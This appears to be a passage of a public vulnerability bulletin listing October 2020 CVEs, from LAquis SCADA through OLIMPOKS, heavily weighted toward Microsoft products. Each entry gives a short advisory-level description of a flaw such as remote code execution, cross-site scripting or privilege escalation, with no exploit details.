MLIST MLIST MLIST MLIST MLIST MLIST MLIST
lcds — laquis_scada	An attacker who convinces a valid user to open a specially crafted project file to exploit could execute code under the privileges of the application due to an out-of-bounds read vulnerability on the LAquis SCADA (Versions prior to 4.3.1.870).	2020-10-14	not yet calculated	CVE-2020-25188 MISC MISC
lenovo — cloud_networking_operating_system	An internal security review has identified an unauthenticated remote code execution vulnerability in Cloud Networking Operating System (CNOS)’ optional REST API management interface. This interface is disabled by default and not vulnerable unless enabled. When enabled, it is only vulnerable where attached to a VRF and as allowed by defined ACLs. Lenovo strongly recommends upgrading to a non-vulnerable CNOS release. Where not possible, Lenovo recommends disabling the REST API management interface or restricting access to the management VRF and further limiting access to authorized management stations via ACL.	2020-10-14	not yet calculated	CVE-2020-8349 MISC
lenovo — hardwarescan_plugin	A DLL search path vulnerability was reported in the Lenovo HardwareScan Plugin for the Lenovo Vantage hardware scan feature prior to version 1.0.46.11 that could allow escalation of privilege.	2020-10-14	not yet calculated	CVE-2020-8345 MISC
lenovo — multiple_devices	A potential vulnerability in the SMI callback function used in the legacy BIOS mode USB drivers in some legacy Lenovo and IBM System x servers may allow arbitrary code execution. Servers operating in UEFI mode are not affected.	2020-10-14	not yet calculated	CVE-2020-8332 MISC
lenovo — thinkpad_stack_wireless_router	An authentication bypass vulnerability was reported in Lenovo ThinkPad Stack Wireless Router firmware version 1.1.3.4 that could allow escalation of privilege.	2020-10-14	not yet calculated	CVE-2020-8350 MISC
libarchive — libarchive	Heap-based buffer overflow in archive_string_append_from_wcs() (archive_string.c) in libarchive-3.4.1dev allows remote attackers to cause a denial of service (out-of-bounds write in heap memory resulting into a crash) via a crafted archive file. NOTE: this only affects users who downloaded the development code from GitHub. Users of the product’s official releases are unaffected.	2020-10-15	not yet calculated	CVE-2020-21674 MISC MISC
libass — libass	In libass 0.14.0, the `ass_outline_construct`’s call to `outline_stroke` causes a signed integer overflow.	2020-10-16	not yet calculated	CVE-2020-26682 MISC MISC
linux — linux_kernel	An issue was discovered in the Linux kernel before 5.8.15. scalar32_min_max_or in kernel/bpf/verifier.c mishandles bounds tracking during use of 64-bit values, aka CID-5b9fbeb75b6a.	2020-10-16	not yet calculated	CVE-2020-27194 MISC MISC
mark_text — mark_text	Mutation XSS exists in Mark Text through 0.16.2 that leads to Remote Code Execution. NOTE: this might be considered a duplicate of CVE-2020-26870; however, it can also be considered an issue in the design of the “source code mode” feature, which parses HTML even though HTML support is not one of the primary advertised roles of the product.	2020-10-16	not yet calculated	CVE-2020-27176 MISC
mcafee — active_response	Improperly implemented security check in McAfee Active Response (MAR) prior to 2.4.4 may allow local administrators to execute malicious code via stopping a core Windows service leaving McAfee core trust component in an inconsistent state resulting in MAR failing open rather than closed	2020-10-15	not yet calculated	CVE-2020-7326 CONFIRM
mcafee — application_and_change_control	Improper privilege assignment vulnerability in the installer McAfee Application and Change Control (MACC) prior to 8.3.2 allows local administrators to change or update the configuration settings via a carefully constructed MSI configured to mimic the genuine installer. This version adds further controls for installation/uninstallation of software.	2020-10-15	not yet calculated	CVE-2020-7334 CONFIRM
mcafee — epolicy_orchistrator	Cross-Site Scripting vulnerability in McAfee ePolicy Orchistrator (ePO) prior to 5.10.9 Update 9 allows administrators to inject arbitrary web script or HTML via parameter values for “syncPointList” not being correctly sanitsed.	2020-10-14	not yet calculated	CVE-2020-7318 MISC
mcafee — epolicy_orchistrator	Cross-Site Scripting vulnerability in McAfee ePolicy Orchistrator (ePO) prior to 5.10.9 Update 9 allows administrators to inject arbitrary web script or HTML via parameter values for “syncPointList” not being correctly sanitsed.	2020-10-14	not yet calculated	CVE-2020-7317 MISC
mcafee — mvision_endpoint_detection_and_response_client	Improperly implemented security check in McAfee MVISION Endpoint Detection and Response Client (MVEDR) prior to 3.2.0 may allow local administrators to execute malicious code via stopping a core Windows service leaving McAfee core trust component in an inconsistent state resulting in MVEDR failing open rather than closed	2020-10-15	not yet calculated	CVE-2020-7327 CONFIRM
mcafee — total_protection	Privilege Escalation vulnerability in McAfee Total Protection (MTP) trial prior to 4.0.176.1 allows local users to schedule tasks which call malicious software to execute with elevated privileges via editing of environment variables	2020-10-14	not yet calculated	CVE-2020-7330 CONFIRM
microhard — bullet-lte	This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microhard Bullet-LTE prior to v1.2.0-r1112. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of authentication headers. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-10596.	2020-10-13	not yet calculated	CVE-2020-17407 N/A
microhard — bullet-lte	This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microhard Bullet-LTE prior to v1.2.0-r1112. Authentication is required to exploit this vulnerability. The specific flaw exists within the handling of the ping parameter provided to tools.sh. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-10595.	2020-10-13	not yet calculated	CVE-2020-17406 N/A
microsoft — .net_framework	An information disclosure vulnerability exists when the .NET Framework improperly handles objects in memory, aka ‘.NET Framework Information Disclosure Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16937 MISC
microsoft — 3d_viewer	A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory.An attacker who successfully exploited the vulnerability would gain execution on a victim system.The security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory., aka ‘Base3D Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16918.	2020-10-16	not yet calculated	CVE-2020-17003 MISC
microsoft — 3d_viewer_and_365_apps_for_enterprise	A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory.An attacker who successfully exploited the vulnerability would gain execution on a victim system.The security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory., aka ‘Base3D Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-17003.	2020-10-16	not yet calculated	CVE-2020-16918 MISC
microsoft — azure_functions	An elevation of privilege vulnerability exists in the way Azure Functions validate access keys.An unauthenticated attacker who successfully exploited this vulnerability could invoke an HTTP Function without proper authorization.This security update addresses the vulnerability by correctly validating access keys used to access HTTP Functions., aka ‘Azure Functions Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16904 MISC
microsoft — dynamics_365	A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka ‘Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability’. This CVE ID is unique from CVE-2020-16956.	2020-10-16	not yet calculated	CVE-2020-16978 MISC
microsoft — dynamics_365	An elevation of privilege vulnerability exists in Microsoft Dynamics 365 Commerce, aka ‘Dynamics 365 Commerce Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16943 MISC
microsoft — dynamics_365	A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka ‘Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability’. This CVE ID is unique from CVE-2020-16978.	2020-10-16	not yet calculated	CVE-2020-16956 MISC
microsoft — excel	A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16931, CVE-2020-16932.	2020-10-16	not yet calculated	CVE-2020-16930 MISC
microsoft — excel	A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16930, CVE-2020-16932.	2020-10-16	not yet calculated	CVE-2020-16931 MISC
microsoft — excel	A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16930, CVE-2020-16931.	2020-10-16	not yet calculated	CVE-2020-16932 MISC
microsoft — excel	A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16930, CVE-2020-16931, CVE-2020-16932.	2020-10-16	not yet calculated	CVE-2020-16929 MISC
microsoft — exchange	An information disclosure vulnerability exists in how Microsoft Exchange validates tokens when handling certain messages, aka ‘Microsoft Exchange Information Disclosure Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16969 MISC
microsoft — network_watcher_agent	An elevation of privilege vulnerability exists in Network Watcher Agent virtual machine extension for Linux, aka ‘Network Watcher Agent Virtual Machine Extension for Linux Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16995 MISC
microsoft — office	An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16934, CVE-2020-16955.	2020-10-16	not yet calculated	CVE-2020-16928 MISC
microsoft — office	An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16928, CVE-2020-16955.	2020-10-16	not yet calculated	CVE-2020-16934 MISC
microsoft — office	An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16928, CVE-2020-16934.	2020-10-16	not yet calculated	CVE-2020-16955 MISC
microsoft — office	A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory, aka ‘Microsoft Office Remote Code Execution Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16954 MISC
microsoft — office_access_connectivity_engine	A remote code execution vulnerability exists when the Microsoft Office Access Connectivity Engine improperly handles objects in memory, aka ‘Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16957 MISC
microsoft — outlook	A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory, aka ‘Microsoft Outlook Remote Code Execution Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16947 MISC
microsoft — outlook	A denial of service vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory, aka ‘Microsoft Outlook Denial of Service Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16949 MISC
microsoft — powershellget	A security feature bypass vulnerability exists in the PowerShellGet V2 module, aka ‘PowerShellGet Module WDAC Security Feature Bypass Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16886 MISC
microsoft — sharepoint_server	An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16948, CVE-2020-16953.	2020-10-16	not yet calculated	CVE-2020-16950 MISC
microsoft — sharepoint_server	A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka ‘Microsoft Office SharePoint XSS Vulnerability’. This CVE ID is unique from CVE-2020-16946.	2020-10-16	not yet calculated	CVE-2020-16945 MISC
microsoft — sharepoint_server	A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka ‘Microsoft SharePoint Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16952.	2020-10-16	not yet calculated	CVE-2020-16951 MISC
microsoft — sharepoint_server	An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16950, CVE-2020-16953.	2020-10-16	not yet calculated	CVE-2020-16948 MISC
microsoft — sharepoint_server	A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka ‘Microsoft Office SharePoint XSS Vulnerability’. This CVE ID is unique from CVE-2020-16945.	2020-10-16	not yet calculated	CVE-2020-16946 MISC
microsoft — sharepoint_server	An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16948, CVE-2020-16950.	2020-10-16	not yet calculated	CVE-2020-16953 MISC
microsoft — sharepoint_server	This vulnerability is caused when SharePoint Server does not properly sanitize a specially crafted request to an affected SharePoint server.An authenticated attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server, aka ‘Microsoft SharePoint Reflective XSS Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16944 MISC
microsoft — sharepoint_server	An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16948, CVE-2020-16950, CVE-2020-16953.	2020-10-16	not yet calculated	CVE-2020-16942 MISC
microsoft — sharepoint_server	An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16942, CVE-2020-16948, CVE-2020-16950, CVE-2020-16953.	2020-10-16	not yet calculated	CVE-2020-16941 MISC
microsoft — sharepoint_server	A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka ‘Microsoft SharePoint Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16951.	2020-10-16	not yet calculated	CVE-2020-16952 MISC
microsoft — visual_studio_code	A remote code execution vulnerability exists in Visual Studio Code when a user is tricked into opening a malicious ‘package.json’ file, aka ‘Visual Studio JSON Remote Code Execution Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-17023 MISC
microsoft — windows	An elevation of privilege vulnerability exists when Microsoft Windows improperly handles reparse points, aka ‘Windows Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16877 MISC
microsoft — windows_10	A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka ‘Media Foundation Memory Corruption Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16915 MISC
microsoft — windows_10	An information disclosure vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16896 MISC
microsoft — windows_10	A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka ‘Jet Database Engine Remote Code Execution Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16924 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when Windows improperly handles COM object creation, aka ‘Windows COM Server Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16916.	2020-10-16	not yet calculated	CVE-2020-16935 MISC
microsoft — windows_10	A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka ‘Microsoft Graphics Components Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16923.	2020-10-16	not yet calculated	CVE-2020-1167 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Application Compatibility Client Library improperly handles registry operations, aka ‘Windows Application Compatibility Client Library Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16876.	2020-10-16	not yet calculated	CVE-2020-16920 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16975, CVE-2020-16976.	2020-10-16	not yet calculated	CVE-2020-16974 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka ‘Windows Kernel Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16890 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16913.	2020-10-16	not yet calculated	CVE-2020-16907 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash, aka ‘Windows Error Reporting Manager Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16895 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles junction points, aka ‘Windows – User Profile Service Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16940 MISC
microsoft — windows_10	A denial of service vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka ‘Windows TCP/IP Denial of Service Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16899 MISC
microsoft — windows_10	A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system.To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application.The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to handle these requests., aka ‘Windows Hyper-V Denial of Service Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-1243 MISC
microsoft — windows_10	A remote code execution vulnerability exists when Windows Network Address Translation (NAT) fails to properly handle UDP traffic, aka ‘Windows NAT Remote Code Execution Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16894 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in the way that the Windows kernel image handles objects in memory.An attacker who successfully exploited the vulnerability could execute code with elevated permissions.To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.The security update addresses the vulnerability by ensuring the Windows kernel image properly handles objects in memory., aka ‘Windows Image Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16892 MISC
microsoft — windows_10	A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka ‘Windows Hyper-V Remote Code Execution Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16891 MISC
microsoft — windows_10	An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.To exploit this vulnerability, an authenticated attacker could run a specially crafted application, aka ‘Windows Kernel Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16938.	2020-10-16	not yet calculated	CVE-2020-16901 MISC
microsoft — windows_10	A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka ‘Microsoft Graphics Components Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-1167.	2020-10-16	not yet calculated	CVE-2020-16923 MISC
microsoft — windows_10	An information disclosure vulnerability exists when the Windows KernelStream improperly handles objects in memory, aka ‘Windows KernelStream Information Disclosure Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16889 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior.A locally authenticated attacker could run arbitrary code with elevated system privileges, aka ‘Windows Installer Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16902 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Storage Services improperly handle file operations, aka ‘Windows Storage Services Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-0764 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory, aka ‘Windows Hyper-V Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-1080.	2020-10-16	not yet calculated	CVE-2020-1047 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory, aka ‘Windows Network Connections Service Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16887 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Storage VSP Driver improperly handles file operations, aka ‘Windows Storage VSP Driver Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16885 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory, aka ‘Windows Hyper-V Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-1047.	2020-10-16	not yet calculated	CVE-2020-1080 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Event System improperly handles objects in memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Event System Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16900 MISC
microsoft — windows_10	A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka ‘Windows TCP/IP Remote Code Execution Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16898 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976.	2020-10-16	not yet calculated	CVE-2020-16973 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka ‘Windows Error Reporting Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16909.	2020-10-16	not yet calculated	CVE-2020-16905 MISC
microsoft — windows_10	A spoofing vulnerability exists when Windows incorrectly validates file signatures, aka ‘Windows Spoofing Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16922 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16907.	2020-10-16	not yet calculated	CVE-2020-16913 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976.	2020-10-16	not yet calculated	CVE-2020-16936 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976.	2020-10-16	not yet calculated	CVE-2020-16972 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when Group Policy improperly checks access, aka ‘Group Policy Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16939 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in Windows Setup in the way it handles directories.A locally authenticated attacker could run arbitrary code with elevated system privileges, aka ‘Windows Setup Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16908 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka ‘Windows Error Reporting Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16905.	2020-10-16	not yet calculated	CVE-2020-16909 MISC
microsoft — windows_10	A security feature bypass vulnerability exists when Microsoft Windows fails to handle file creation permissions, which could allow an attacker to create files in a protected Unified Extensible Firmware Interface (UEFI) location.To exploit this vulnerability, an attacker could run a specially crafted application to bypass Unified Extensible Firmware Interface (UEFI) variable security in Windows.The security update addresses the vulnerability by correcting security feature behavior to enforce permissions., aka ‘Windows Security Feature Bypass Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16910 MISC
microsoft — windows_10	A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory, aka ‘GDI+ Remote Code Execution Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16911 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976.	2020-10-16	not yet calculated	CVE-2020-16912 MISC
microsoft — windows_10	An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka ‘Windows Kernel Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16901.	2020-10-16	not yet calculated	CVE-2020-16938 MISC
microsoft — windows_10	An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system, aka ‘Windows GDI+ Information Disclosure Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16914 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16976.	2020-10-16	not yet calculated	CVE-2020-16975 MISC
microsoft — windows_10	A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka ‘Windows Camera Codec Pack Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16968.	2020-10-16	not yet calculated	CVE-2020-16967 MISC
microsoft — windows_10	A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16927 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when Windows improperly handles COM object creation, aka ‘Windows COM Server Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16935.	2020-10-16	not yet calculated	CVE-2020-16916 MISC
microsoft — windows_10	An information disclosure vulnerability exists when the Windows Enterprise App Management Service improperly handles certain file operations, aka ‘Windows Enterprise App Management Service Information Disclosure Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16919 MISC
microsoft — windows_10	A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka ‘Windows Camera Codec Pack Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16967.	2020-10-16	not yet calculated	CVE-2020-16968 MISC
microsoft — windows_10	An information disclosure vulnerability exists in Text Services Framework when it fails to properly handle objects in memory, aka ‘Windows Text Services Framework Information Disclosure Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16921 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975.	2020-10-16	not yet calculated	CVE-2020-16976 MISC
microsoft — windows_codecs_library	A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka ‘Microsoft Windows Codecs Library Remote Code Execution Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-17022 MISC
microsoft — windows_server	An elevation of privilege vulnerability exists when the Windows iSCSI Target Service improperly handles file operations, aka ‘Windows iSCSI Target Service Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16980 MISC
microsoft — word	A security feature bypass vulnerability exists in Microsoft Word software when it fails to properly handle .LNK files, aka ‘Microsoft Word Security Feature Bypass Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16933 MISC
monero — monero_wallet_gui	monero-wallet-gui in Monero GUI 0.17.0.1 includes the . directory in an embedded RPATH (with a preference ahead of /usr/lib), which allows local users to gain privileges via a Trojan horse library in the current working directory.	2020-10-10	not yet calculated	CVE-2020-26947 MISC
mybatis — mybatis	MyBatis before 3.5.6 mishandles deserialization of object streams.	2020-10-10	not yet calculated	MISC MISC
netbios — netbios	An information disclosure vulnerability exists when NetBIOS over TCP (NBT) Extensions (NetBT) improperly handle objects in memory, aka ‘NetBT Information Disclosure Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16897 MISC
netgear — multiple_routers	This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of NETGEAR R6120, R6080, R6260, R6220, R6020, JNR3210, and WNR2020 routers with firmware 1.0.66. Authentication is not required to exploit this vulnerability. The specific flaw exists within the mini_httpd service, which listens on TCP port 80 by default. The issue results from incorrect string matching logic when accessing protected pages. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-10754.	2020-10-13	not yet calculated	CVE-2020-17409 N/A N/A
octopus — octopus_deploy	In Octopus Deploy 3.1.0 to 2020.4.0, certain scripts can reveal sensitive information to the user in the task logs.	2020-10-12	not yet calculated	CVE-2020-25825 CONFIRM CONFIRM CONFIRM CONFIRM
olimpoks — olimpoks	OLIMPOKS before 5.1.0 allows Auth/Admin ErrorMessage XSS.	2020-10-16	not yet calculated	CVE-2020-16270 MISC MISC
